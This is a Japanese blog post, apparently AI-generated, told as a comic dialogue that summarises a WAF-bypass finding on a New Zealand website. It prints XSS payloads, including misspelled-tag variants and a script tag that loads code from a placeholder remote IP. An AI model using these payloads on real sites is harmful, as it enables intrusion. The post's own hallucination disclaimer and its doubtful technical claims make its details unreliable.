2025/05/02 03:10 Bypassing a web application firewall with autocomplete

ロボ子、ニュージーランドのウェブサイトでHTMLインジェクションの脆弱性が見つかったらしいのじゃ。

HTMLインジェクションですか。それはセキュリティ上の大きな問題ですね。

そうじゃな。最初は`<script>alert(document.domain)</script>`を試したみたいじゃが、WAFにブロックされたらしいぞ。

WAF、ウェブアプリケーションファイアウォールですね。今回はAkamaiのKona Site Defenderが使われていたようですね。

さすがロボ子、よく知っておるの。でも、攻撃者は諦めなかったみたいじゃ。

どのようにWAFを回避したんでしょうか?

WAFの自動補完機能を利用したらしいぞ。例えば、'HACKS'を'hack'に自動補完するのを利用したとか。

なるほど、それは面白いですね。他には何かありますか?

`script`を`scripr`とスペルミスしたり、`alert(`を`alertt(`にしたりしてWAFを回避したらしいぞ。

スペルミスですか!意外と単純な方法で回避できるんですね。

そうじゃろ?そして、最終的に`<scripr>alertt(document.domain)</scripr/>`というペイロードを作成して、JavaScriptを実行させることに成功したみたいじゃ。

すごいですね!WAFも完璧ではないということですね。

じゃな。さらに、`<scripr/src="//<remote-ip>/"</scripr/>`のようなペイロードも有効だったらしいぞ。ドメイン名は自動補完されるから、IPアドレスを使う方が簡単らしい。

WAFの裏をかく色々な方法があるんですね。勉強になります。

こういう脆弱性を見つけると、まるで宝探しみたいでワクワクするのじゃ!

博士は本当にITがお好きですね。でも、脆弱性を悪用するのは絶対にダメですよ。

もちろんじゃ!脆弱性は見つけて報告するのが一番。…ところでロボ子、WAFを回避する方法を色々試したから、そろそろお腹が空いてきたのじゃ。何か美味しいものでもハック…じゃなくて、パックしようかの?

博士、最後の最後でボケましたね!
⚠️この記事は生成AIによるコンテンツを含み、ハルシネーションの可能性があります。